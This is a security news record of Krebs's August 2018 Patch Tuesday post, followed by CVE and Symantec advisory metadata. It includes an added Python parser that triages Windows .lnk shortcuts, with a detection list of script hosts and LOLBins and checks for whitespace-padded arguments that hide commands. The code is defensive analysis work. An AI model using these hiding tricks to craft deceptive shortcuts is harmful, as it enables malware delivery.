ID KREBS:72DFB7C4ADFA38C01CEC9D2F783FF30A Type krebs Reporter BrianKrebs Modified 2018-08-15T14:52:21
Description
Adobe and Microsoft each released security updates for their software on Tuesday. Adobe plugged five security holes in its Flash Player browser plugin. Microsoft pushed 17 updates to fix at least 60 vulnerabilities in Windows and other software, including two "zero-day" flaws that attackers were already exploiting before Microsoft issued patches to fix them.
According to security firm Ivanti, the first of the two zero-day flaws (CVE-2018-8373) is a critical memory-corruption bug in Internet Explorer's scripting engine that attackers could use to foist malware on IE users who browse to hacked or booby-trapped sites. The other zero-day (CVE-2018-8414) is a bug in the way the Windows 10 shell validates file paths; it could allow an attacker to run code of their choice in the context of the logged-in user.
Microsoft also patched more variants of the Meltdown/Spectre class of speculative-execution memory vulnerabilities, collectively dubbed "Foreshadow" by the team of researchers who discovered and reported the Intel-based flaws; Microsoft's own writeup refers to the same issue as L1 Terminal Fault (L1TF). For more information about how Foreshadow works, check out the researchers' academic paper (PDF) and the video embedded in the original post. Microsoft's analysis is here.
One nifty little bug fixed in this patch batch is CVE-2018-8345. It addresses a problem in the way Windows handles shortcut files; ending in the “.lnk” extension, shortcut files are Windows components that link (hence the “lnk” extension) easy-to-recognize icons to specific executable programs, and are typically placed on the user’s Desktop or Start Menu.
That description of a shortcut file was taken verbatim from the first widely read report on what would later be dubbed the Stuxnet worm, which also employed an exploit for a weakness in the way Windows handled shortcut (.lnk) files. The point that matters for defenders is the same now as then: Explorer parses a shortcut when it renders the folder that contains it, so the file never has to be double-clicked. According to security firm Qualys, this patch should be prioritized for both workstations and servers, because exploitation does not require the user to click the file. "Simply viewing a malicious LNK file can execute code as the logged-in user," Qualys' Jimmy Graham wrote.
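Because the shell processes shortcuts on sight, a responder who finds a suspicious .lnk on a share or a USB stick wants to read it without letting Explorer touch it. The parser below is an added example written for this post; it is not code from Krebs, Qualys or Microsoft, and it does not reproduce CVE-2018-8345 (the post gives no details of that trigger). It walks the public MS-SHLLINK layout (ShellLinkHeader, LinkInfo, StringData, ExtraData) to recover the target path, arguments and any EnvironmentVariableDataBlock, then applies a few triage heuristics of my own (script-host targets, whitespace-padded or over-long arguments, targets supplied only through environment variables). `build_lnk` constructs a minimal sample shortcut so everything runs offline; the heuristic thresholds are assumptions, not Microsoft guidance.

```python
"""Read-only .lnk (MS-SHLLINK) parser with triage heuristics.
Added example; not code from the post or from Microsoft. Does not reproduce
CVE-2018-8345. Nothing here executes or resolves the shortcut."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
ENV_VAR_BLOCK_SIG = 0xA0000001          # EnvironmentVariableDataBlock, BlockSize 0x314
SCRIPT_HOSTS = ("cmd.exe", "powershell", "wscript", "cscript", "mshta", "rundll32", "regsvr32")


def _cstring(buf: bytes, off: int, unicode: bool = False) -> str:
    """NUL-terminated string at off (UTF-16LE if unicode, else ANSI/cp1252)."""
    if unicode:
        end = off
        while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
            end += 2
        return buf[off:end].decode("utf-16-le", "replace")
    end = buf.find(b"\x00", off)
    return buf[off:len(buf) if end < 0 else end].decode("cp1252", "replace")


def parse_lnk(data: bytes) -> dict:
    """Walk ShellLinkHeader, LinkInfo, StringData and ExtraData in file order."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"flags": flags, "local_base_path": "", "name": "", "relative_path": "",
            "working_dir": "", "arguments": "", "icon_location": "", "env_target": ""}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:                       # skip the PIDL (IDListSize + items)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr_size, li_flags = struct.unpack_from("<III", data, off)
        if li_flags & 0x1:                                     # VolumeIDAndLocalBasePath
            base_off = struct.unpack_from("<I", data, off + 0x10)[0]
            suffix_off = struct.unpack_from("<I", data, off + 0x18)[0]
            info["local_base_path"] = _cstring(data, off + base_off) + _cstring(data, off + suffix_off)
        off += li_size
    unicode = bool(flags & IS_UNICODE)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:                                       # CountCharacters + chars, no NUL
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            raw = data[off:off + (count * 2 if unicode else count)]
            info[key] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
            off += len(raw)
    while off + 8 <= len(data):                                # ExtraData until a block < 4 bytes
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == ENV_VAR_BLOCK_SIG and size == 0x314:         # TargetAnsi[260] then TargetUnicode[520]
            info["env_target"] = _cstring(data, off + 8 + 260, True) or _cstring(data, off + 8)
        off += size
    return info


def triage(info: dict) -> list:
    """Heuristics of my own (assumed thresholds, not Microsoft's guidance)."""
    findings = []
    target = " ".join((info["local_base_path"], info["relative_path"], info["env_target"])).lower()
    if any(h in target for h in SCRIPT_HOSTS):
        findings.append("target is a script host or LOLBin")
    args = info["arguments"]
    if len(args) - len(args.lstrip()) > 16:
        findings.append("arguments padded with leading whitespace (hides the command in Properties)")
    if len(args) > 260:
        findings.append("arguments exceed what the Properties dialog shows")
    if info["env_target"] and not info["local_base_path"]:
        findings.append("target supplied only via EnvironmentVariableDataBlock")
    return findings


def build_lnk(local_base_path: str, arguments: str = "", env_target: str = "") -> bytes:
    """Constructed sample shortcut (not a real-world file) so the parser runs offline."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + b"\x00" * 52
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"       # fixed drive, empty label
    base = local_base_path.encode("cp1252") + b"\x00"
    vol_off = hdr = 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = (struct.pack("<IIIIIII", suffix_off + 1, hdr, 1, vol_off, base_off, 0, suffix_off)
                 + volume_id + base + b"\x00")
    body = header + link_info
    if arguments:
        body += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    if env_target:
        ansi = env_target.encode("cp1252")[:259].ljust(260, b"\x00")
        uni = env_target.encode("utf-16-le")[:518].ljust(520, b"\x00")
        body += struct.pack("<II", 0x314, ENV_VAR_BLOCK_SIG) + ansi + uni
    return body + struct.pack("<I", 0)                                  # terminal block
```

To use it on real files, read each `.lnk` with `open(path, "rb")`, pass the bytes to `parse_lnk`, and print `triage(...)` alongside `local_base_path`, `env_target` and `arguments.strip()`; run it from a Linux or macOS analysis box, or at least from a directory listing you are not viewing in Explorer, since the whole point is that the shell never parses the file.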
Not infrequently, Redmond ships updates that end up causing stability issues for some users, and it doesn’t hurt to wait a day or two to see whether any major problems are reported with new updates before installing them. Microsoft doesn’t make it easy for Windows 10 users to turn off automatic installation, but it is possible. For all other Windows OS users, if you’d rather be alerted to new updates when they’re available so you can choose when to install them, there’s a setting for that in Windows Update.
It’s a good idea to get in the habit of backing up your computer before applying monthly updates from Microsoft. Windows has some built-in tools that can help recover from bad patches, but restoring the system to a backup image taken just before installing updates is often much less hassle, and it adds some peace of mind while you’re sitting there praying for the machine to reboot successfully after patching.
Adobe's Flash update brings the program to v. 30.0.0.154 for Windows, macOS, Chrome and Linux. Most readers here know how I feel about Flash, which is a major security liability and a frequent target of browser-based attacks. The updates from Microsoft include these Flash fixes for IE, and Google Chrome has already pushed an update to address these five Flash flaws (although a browser restart may be needed).
But seriously, if you don't have a specific need for Flash, just disable it already. Chrome is set to ask before playing Flash objects, but disabling Flash in Chrome is simple enough. Paste “chrome://settings/content” into a Chrome browser bar and then select “Flash” from the list of items. By default it should be set to “Ask first” before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.
By default, Mozilla Firefox on Windows computers with Flash installed runs the plugin in a sandboxed “protected mode” and sets it to “Ask to Activate,” which prompts the user to decide whether to enable the plugin before Flash content runs on a Web site.
Adobe also released security updates for its PDF Reader and Acrobat products.
As always, please leave a note in the comments below if you experience any problems installing any of these updates.
{"id": "KREBS:72DFB7C4ADFA38C01CEC9D2F783FF30A", "type": "krebs", "bulletinFamily": "blog", "title": "Patch Tuesday, August 2018 Edition", "description": "**Adobe **and **Microsoft** each released security updates for their software on Tuesday. Adobe plugged five security holes in its **Flash Player** browser plugin. Microsoft pushed 17 updates to fix at least 60 vulnerabilities in Windows and other software, including two \"[zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>)\" flaws that attackers were already exploiting before Microsoft issued patches to fix them.\n\nAccording to security firm **Ivanti**, the first of the two zero-day flaws ([CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>)) is a critical flaw in **Internet Explorer** that attackers could use to foist malware on IE users who browse to hacked or booby-trapped sites. The other zero-day is a bug ([CVE-2018-8414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414>)) in the Windows 10 shell that could allow an attacker to run code of his choice.\n\nMicrosoft also patched more variants of the [Meltdown/Spectre memory vulnerabilities](<https://krebsonsecurity.com/2018/01/scary-chip-flaws-raise-spectre-of-meltdown/>), collectively dubbed \"[Foreshadow](<https://foreshadowattack.eu/>)\" by a team of researchers who discovered and reported the **Intel**-based flaws. For more information about how Foreshadow works, check out their [academic paper](<https://foreshadowattack.eu/foreshadow.pdf>) (PDF), and/or the video below. Microsoft's analysis is [here](<https://blogs.technet.microsoft.com/srd/2018/08/10/analysis-and-mitigation-of-l1-terminal-fault-l1tf/>).\n\nOne nifty little bug fixed in this patch batch is [CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>). 
It addresses a problem in the way Windows handles shortcut files; ending in the \u201c.lnk\u201d extension, shortcut files are Windows components that link (hence the \u201clnk\u201d extension) easy-to-recognize icons to specific executable programs, and are typically placed on the user\u2019s Desktop or Start Menu.\n\nThat description of a shortcut file was taken verbatim from the [first widely read report](<https://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/>) on what would later be dubbed the [Stuxnet worm](<https://en.wikipedia.org/wiki/Stuxnet>), which also employed an exploit for a weakness in the way Windows handled shortcut (.lnk) files. According to security firm [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2018/08/14/august-patch-tuesday-63-vulns-l1tf-exchange-sql-active-attacks-on-ie-flaw>), this patch should be prioritized for both workstations and servers, as the user does not need to click the file to exploit. \"Simply viewing a malicious LNK file can execute code as the logged-in user,\" Qualys' **Jimmy Graham** wrote.\n\nNot infrequently, Redmond ships updates that end up causing stability issues for some users, and it doesn\u2019t hurt to wait a day or two before seeing if any major problems are reported with new updates before installing them. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, but it is possible. For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update.\n\nIt\u2019s a good idea to get in the habit of backing up your computer before applying monthly updates from Microsoft. 
Windows has some built-in tools that can help recover from bad patches, but restoring the system to a backup image taken just before installing updates is often much less hassle and an added peace of mind while you\u2019re sitting there praying for the machine to reboot successfully after patching.\n\nAdobe's Flash update brings the program to [_v. 30.0.0.154_](<https://helpx.adobe.com/security/products/flash-player/apsb18-25.html>) for Windows,** macOS**, **Chrome** and **Linux**. Most readers here know how I feel about Flash, which is a major security liability and a frequent target of browser-based attacks. The updates from Microsoft include these Flash fixes for IE, and **Google Chrome** has already pushed an update to address these five Flash flaws (although a browser restart may be needed).\n\nBut seriously, if you don't have a specific need for Flash, just disable it already. Chrome is set to ask before playing Flash objects, but disabling Flash in Chrome is simple enough. Paste \u201cchrome://settings/content\u201d into a Chrome browser bar and then select \u201cFlash\u201d from the list of items. 
By default it should be set to \u201cAsk first\u201d before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.\n\nBy default, Mozilla Firefox on Windows computers with Flash installed runs Flash in a \u201cprotected mode,\u201d which prompts the user to decide if they want to enable the plugin before Flash content runs on a Web site.\n\nAdobe also released [security updates](<https://helpx.adobe.com/security/products/acrobat/apsb18-29.html>) for its PDF Reader and Acrobat products.\n\nAs always, please leave a note in the comments below if you experience any problems installing any of these updates.", "published": "2018-08-15T14:52:21", "modified": "2018-08-15T14:52:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://krebsonsecurity.com/2018/08/patch-tuesday-august-2018-edition/", "reporter": "BrianKrebs", "references": [], "cvelist": ["CVE-2018-8345", "CVE-2018-8373", "CVE-2018-8414"], "lastseen": "2018-08-15T17:18:45", "viewCount": 17, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-15T17:18:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8373", "CVE-2018-8345", "CVE-2018-8414"]}, {"type": "symantec", "idList": ["SMNTC-105037", "SMNTC-105027", "SMNTC-105016"]}, {"type": "attackerkb", "idList": ["AKB:D2380257-7D97-4A85-961C-A25C70361E50"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C7D9126F912DAC06B9FBA1B29BF174BC", "MALWAREBYTES:37E5B8085C06BEB2C5CED2D9549F29CB"]}, {"type": "thn", "idList": ["THN:F033FC8698702175A4736D089C3C9D13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994507", "MYHACK58:62201996031", "MYHACK58:62201891201", "MYHACK58:62201994516"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:86F4EEA0E7CEE93E9EA6A2FB3C2315F0"]}, {"type": "securelist", "idList": ["SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C"]}, {"type": "zdi", "idList": ["ZDI-18-942", "ZDI-18-953"]}, {"type": "threatpost", "idList": 
["THREATPOST:F6D26AE5EBA39346A2B00CE4C6470A88", "THREATPOST:961233DDAF80602C2DDEC2B819294F05"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:7105AC02468FA173C8BDB7936612EE77"]}, {"type": "mskb", "idList": ["KB4340939"]}, {"type": "kaspersky", "idList": ["KLA11306", "KLA11789", "KLA11309"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_AUG_INTERNET_EXPLORER.NASL", "SMB_NT_MS18_AUG_4343887.NASL", "SMB_NT_MS18_AUG_4343897.NASL", "SMB_NT_MS18_AUG_WIN2008.NASL", "SMB_NT_MS18_AUG_4343900.NASL", "SMB_NT_MS18_AUG_4343898.NASL", "SMB_NT_MS18_AUG_4343909.NASL", "SMB_NT_MS18_AUG_4343885.NASL", "SMB_NT_MS18_AUG_4343892.NASL", "SMB_NT_MS18_AUG_4343901.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813846", "OPENVAS:1361412562310813841", "OPENVAS:1361412562310813842", "OPENVAS:1361412562310813844", "OPENVAS:1361412562310813843", "OPENVAS:1361412562310813845", "OPENVAS:1361412562310813840"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A9E55A97439608C62C1BF62669B8074A"]}], "modified": "2018-08-15T17:18:45", "rev": 2}, "vulnersScore": 6.4}}
{"cve": [{"lastseen": "2021-02-02T06:52:43", "description": "A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths, aka \"Windows Shell Remote Code Execution Vulnerability.\" This affects Windows 10 Servers, Windows 10.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "title": "CVE-2018-8414", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8414"], "modified": "2018-10-12T19:47:00", "cpe": ["cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server:1709", "cpe:/o:microsoft:windows_server:1803", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_10:1709"], "id": "CVE-2018-8414", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8414", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1803:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.", "edition": 5, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "title": "CVE-2018-8373", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8373"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9"], "id": "CVE-2018-8373", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8373", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:42", "description": "A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed, aka \"LNK Remote Code Execution Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8346.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "title": "CVE-2018-8345", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8345"], "modified": "2018-09-07T15:37:00", "cpe": ["cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_server_2012:r2", 
"cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2018-8345", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8345", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:itanium:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:itanium:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-08-15T00:15:16", "bulletinFamily": "software", "cvelist": ["CVE-2018-8414"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2018-08-14T00:00:00", "published": "2018-08-14T00:00:00", "id": "SMNTC-105016", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105016", "type": "symantec", "title": "Microsoft Windows Shell CVE-2018-8414 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-15T02:14:38", "bulletinFamily": "software", "cvelist": ["CVE-2018-8373"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the affected application.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2018-08-14T00:00:00", "published": "2018-08-14T00:00:00", "id": "SMNTC-105037", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105037", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2018-8373 Remote Memory Corruption Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-15T00:15:18", "bulletinFamily": "software", "cvelist": ["CVE-2018-8345"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks may cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * 
Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
